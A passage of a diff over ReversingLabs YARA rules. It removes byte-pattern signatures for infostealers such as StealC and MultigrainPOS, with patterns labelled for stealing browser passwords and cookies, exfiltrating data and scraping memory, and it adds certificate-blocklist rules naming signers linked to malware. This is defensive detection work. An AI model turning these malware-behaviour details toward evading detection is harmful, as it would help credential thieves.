FF C0 80 3C 03 ?? 75 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? 41 0F 10 34 24 4C 89 6C 24 - ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 49 C7 C0 ?? ?? ?? ?? 66 0F - 1F 44 00 ?? 49 FF C0 42 80 3C 03 ?? 75 ?? 48 8B D3 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 0F - 29 74 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? - ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D7 E8 ?? ?? ?? ?? 48 8B - C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 - 48 8B D6 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D6 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D - 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F - 47 55 ?? 4C 8B 45 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? - ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 42 80 3C 06 ?? 75 ?? 48 8B D6 48 8D 4D ?? E8 - ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 43 80 3C 06 ?? 75 ?? 49 8B D6 48 8D 4D ?? - E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 48 89 5C 24 ?? 48 8D 55 ?? 48 8B - } - $collect_browser_passwords_p3 = { - CB E8 ?? ?? ?? ?? 90 48 8D 4B ?? 48 8D 55 ?? E8 ?? ?? ?? ?? 90 48 8D 4B ?? 48 8D 95 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 57 ?? 4C 8B C2 48 8B CF E8 ?? ?? ?? ?? 48 83 47 - ?? ?? EB ?? 4C 8D 45 ?? 48 8B D3 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? - ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C - 89 6D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? - 0F 84 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 49 8B CC E8 ?? ?? ?? - ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? - 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 - ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B - 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 - ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B - 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? - C6 45 ?? ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C7 48 8B 8D ?? ?? ?? - ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 0F 28 B4 24 ?? ?? ?? ?? 48 81 C4 - ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3 - } - $collect_cookies_p1 = { - 48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? - ?? ?? ?? 0F 29 B4 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? - 48 63 DA 4C 8B F1 48 89 4D ?? C7 44 24 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 01 0F 11 41 ?? - 33 FF 48 89 39 48 89 79 ?? 48 89 79 ?? 48 89 79 ?? 8D 4F ?? E8 ?? ?? ?? ?? 48 89 78 - ?? 49 89 06 4C 89 30 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 0C - 9B 4C 8D 05 ?? ?? ?? ?? 49 8D 50 ?? 48 8D 14 CA 49 83 7C C8 ?? ?? 76 ?? 48 8B 12 4D - 8B 44 C8 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B - 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 F3 0F 7F 45 ?? C6 45 ?? ?? - 48 8B 4D ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? - 84 C0 0F 84 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 7D ?? 48 89 7D ?? - 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? - 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 89 7D ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 4D ?? - 48 8D 55 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 48 8B D8 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? - ?? 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? - 48 89 7C 24 ?? 4C 8D 4D ?? 41 B8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 85 C0 74 - ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? - ?? 0F 1F 80 ?? ?? ?? ?? 33 D2 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B F0 BA ?? ?? ?? ?? - 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 - } - $collect_cookies_p2 = { - 4C 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B D8 BA ?? ?? ?? ?? 48 8B - 4D ?? FF 15 ?? ?? ?? ?? 4C 8B E0 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B - E8 48 85 F6 75 ?? 48 85 FF 75 ?? 48 85 DB 0F 84 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 - FF C1 80 3C 0E ?? 75 ?? 48 85 C9 75 ?? 48 C7 C0 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? - 48 FF C0 80 3C 07 ?? 75 ?? 48 85 C0 75 ?? 48 C7 C0 ?? ?? ?? ?? 48 FF C0 80 3C 03 ?? - 75 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 45 85 ED 0F 8E ?? ?? - ?? ?? 48 C7 C0 ?? ?? ?? ?? 48 FF C0 80 3C 03 ?? 75 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? - 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B D6 E8 ?? ?? - ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 48 8B C8 48 8B D7 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 0F 10 30 - 45 33 ED 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 49 C7 - C0 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 49 FF C0 46 38 2C 03 75 ?? 48 8B D3 48 8D 4C 24 - ?? E8 ?? ?? ?? ?? 0F 29 74 24 ?? 4C 8D 44 24 ?? 48 8D 54 24 ?? 48 8D 4D ?? E8 ?? ?? - ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 - 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? - 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 49 8B D7 E8 ?? ?? - ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 48 8B C8 49 8B D4 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 - } - $collect_cookies_p3 = { - 49 C7 C0 ?? ?? ?? ?? 90 49 FF C0 42 80 3C 06 ?? 75 ?? 48 8B D6 48 8D 4D ?? E8 ?? ?? - ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 00 49 FF C0 42 80 3C 07 ?? 75 ?? 48 8B D7 48 8D 4D - ?? E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 00 49 FF C0 43 80 3C 07 ?? 75 ?? 49 8B - D7 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 43 80 3C 04 ?? - 75 ?? 49 8B D4 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 83 7D ?? ?? 48 0F - 47 55 ?? 4C 8B 45 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 49 8B 56 ?? 4C 8D 45 ?? 49 3B 56 ?? - 74 ?? E8 ?? ?? ?? ?? 49 8B 56 ?? 4C 8B C2 49 8B CE E8 ?? ?? ?? ?? 49 81 46 ?? ?? ?? - ?? ?? EB ?? 49 8B CE E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 - F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 6D ?? 48 C7 45 ?? - ?? ?? ?? ?? C6 45 ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 - 8D 4D ?? E8 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 - FF 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 - 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? - ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 - ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? - ?? 12 00 48 8B 4D ?? F3 0F 7F 45 ?? C6 45 ?? ?? 48 89 7D ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 90 49 8B C6 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? - ?? 0F 28 B4 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3 - } - condition: - uint16(0)==0x5A4D and (($network_communication) and ( all of ($find_sensitive_files_p*)) and ( all of ($parse_firefox_configuration_p*)) and ( all of ($collect_browser_passwords_p*)) and ( all of ($collect_cookies_p*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TASK ANNA LIMITED" and (pe.signatures[i].serial=="00:ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" or pe.signatures[i].serial=="ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6") and 1647388800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Infostealer_Multigrainpos : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_84A4A0D0657E217B176B455E2465Aee0 : INFO FILE { meta: - description = "Yara rule that detects MultigrainPOS infostealer." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "595c04af-802f-556d-b22b-23cac79b256e" - date = "2020-07-15" - modified = "2020-07-15" + id = "1484a28d-ce7c-506f-8cbb-73ac541a0907" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/infostealer/Win32.Infostealer.MultigrainPOS.yara#L1-L88" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9808c95b850a54677c4132057b8372cabf0159920b7e0e6834a83f0d39c088fa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11784-L11802" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "92f6e90bd21182bece68ac1651105f96a18c5b1497d30e0040a978e349341bdb" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Infostealer" - tc_detection_name = "MultigrainPOS" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $data_exfiltration_v10_1 = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 1D ?? ?? ?? ?? 56 57 8B 3D ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F - 43 45 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81 - FE ?? ?? ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 75 ?? 83 7D ?? ?? 5F 5E 5B 72 ?? FF 75 ?? E8 - ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 CD B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? - FF 75 ?? FF D7 68 ?? ?? ?? ?? FF D3 EB - } - $memory_scraping_v10_1 = { - 6A ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? 8B 8D ?? ?? - ?? ?? EB ?? 3C ?? 7C ?? 3C ?? 7E ?? 8A 46 ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 74 - } - $process_search_v10_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? - 85 C0 74 ?? 8B 3D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 1D ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? 8D - 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75 - } - $service_creation_v10_1 = { - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 5E 8B 4C 24 ?? 33 CC E8 ?? ?? - ?? ?? 8B E5 5D C3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - FF 15 - } - $process_search_v11_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8B 7D ?? FF 15 ?? - ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 8D 49 ?? 68 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? - FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF D3 EB ?? 8D 8D - ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 66 89 - 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 EB ?? 8D A4 24 ?? - ?? ?? ?? EB ?? 8D 49 ?? 0F B7 84 0D ?? ?? ?? ?? 66 89 84 0D ?? ?? ?? ?? 8D 49 ?? 66 - 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 - } - $memory_scraping_v11_1 = { - 6A ?? 56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8 ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 6A ?? - 56 8B CF E8 ?? ?? ?? ?? 6A ?? 56 8B CF E8 - } - $data_exfiltration_v11_1 = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8A 5D ?? 56 57 8B 3D ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 8D 4D ?? 51 6A ?? 6A ?? 8D 45 ?? 0F 43 45 ?? - 6A ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? 8B 45 ?? 50 8B 70 ?? FF D7 81 FE ?? ?? - ?? ?? 74 ?? 81 FE ?? ?? ?? ?? 74 ?? 84 DB 74 ?? 33 F6 83 7D ?? ?? 72 ?? FF 75 ?? E8 - ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 8B C6 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? - FF 75 ?? FF D7 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 84 DB 74 ?? EB ?? BE ?? ?? ?? ?? EB - } - $service_creation_v11_1 = { - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 4C 24 ?? C7 44 24 ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 4C 24 ?? 33 CC E8 ?? ?? ?? - ?? 8B E5 5D C3 8D 44 24 ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 - } - condition: - uint16(0)==0x5A4D and (($data_exfiltration_v10_1 and $memory_scraping_v10_1 and $process_search_v10_1 and $service_creation_v10_1) or ($process_search_v11_1 and $memory_scraping_v11_1 and $data_exfiltration_v11_1 and $service_creation_v11_1)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AATB ApS" and (pe.signatures[i].serial=="00:84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0" or pe.signatures[i].serial=="84:a4:a0:d0:65:7e:21:7b:17:6b:45:5e:24:65:ae:e0") and 1616457600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Infostealer_Stealc : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_B8F726508Cf1D7B7913Bf4Bbd1E5C19C : INFO FILE { meta: - description = "Yara rule that detects StealC infostealer." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b53bbf15-3e94-513c-91a9-83dda421063b" - date = "2023-06-07" - modified = "2023-06-07" + id = "eb441b57-0f28-5609-b987-157e1f026b0c" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/infostealer/Win32.Infostealer.StealC.yara#L1-L57" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bea1cf370150387eb185deff726e10e660e7eb571c20d22878def08b36f457bf" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11804-L11822" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ec05c7e41e309aff00ae819c63f5bdc8e4172c611779da345efd211e48c9efb1" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Infostealer" - tc_detection_name = "StealC" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $resolve_windows_api = { - 55 8B EC 51 83 65 ?? ?? 56 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 00 8B 40 ?? - 89 45 ?? 8B 75 ?? 89 35 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 - } - $load_sqlite3_functions = { - 55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 50 89 45 ?? 89 4D ?? 8B 4D ?? 8D - 45 ?? 50 89 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 45 ?? 57 89 45 ?? 8B 7D ?? - B9 ?? ?? ?? ?? 33 C0 F3 AA 5F 33 C0 C9 C3 8B 45 ?? 85 C0 74 ?? 53 8B 58 ?? 56 8B 70 - ?? FF 35 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? - A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? - ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 - } - $check_license_expiration_date = { - 55 8B EC 83 E4 ?? 83 EC ?? 57 33 C0 66 89 44 24 ?? 83 64 24 ?? ?? 8D 7C 24 ?? AB AB - AB 66 AB 33 C0 66 89 44 24 ?? 8D 7C 24 ?? AB AB AB 66 AB 33 C0 21 44 24 ?? 8D 7C 24 - ?? AB 8D 7C 24 ?? AB 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 8D - 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? - 8B 44 24 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? - 8D 44 24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 3B 44 24 ?? 72 ?? 77 ?? - 8B 44 24 ?? 3B 44 24 ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ($resolve_windows_api) and ($load_sqlite3_functions) and ($check_license_expiration_date) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Merkuri LLC" and (pe.signatures[i].serial=="00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures[i].serial=="b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c") and 1619568000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_PUA_Domaiq : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6A241Ffe96A6349Df608D22C02942268 : INFO FILE { meta: - description = "Yara rule that detects Domaiq potentially unwanted application." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "44129e4b-7dc2-5af0-b466-80dc4f4d6388" - date = "2020-07-28" - modified = "2020-07-28" + id = "8a8decfe-c91a-562c-9376-462cab598373" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/pua/Win32.PUA.Domaiq.yara#L1-L169" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e291a639aa027a2257eec2853e40a222afabf23b32898326a1d5b48be823202c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11824-L11840" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "79db8be7ca3ed80eb1e3a9401e8fec2b83da8b95b16789ed0b59bb7f4639a94d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "PUA" - tc_detection_name = "Domaiq" - tc_detection_factor = 1 + category = "INFO" importance = 25 - strings: - $payload = "PEFxdWlFbXBpZXphRWxQYXlsb2FkPg" - $NSIS_CheckIntegrity = { - 57 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 75 ?? 6A 1C 8D 45 - D8 53 50 E8 ?? ?? ?? ?? 8B 45 D8 A9 F0 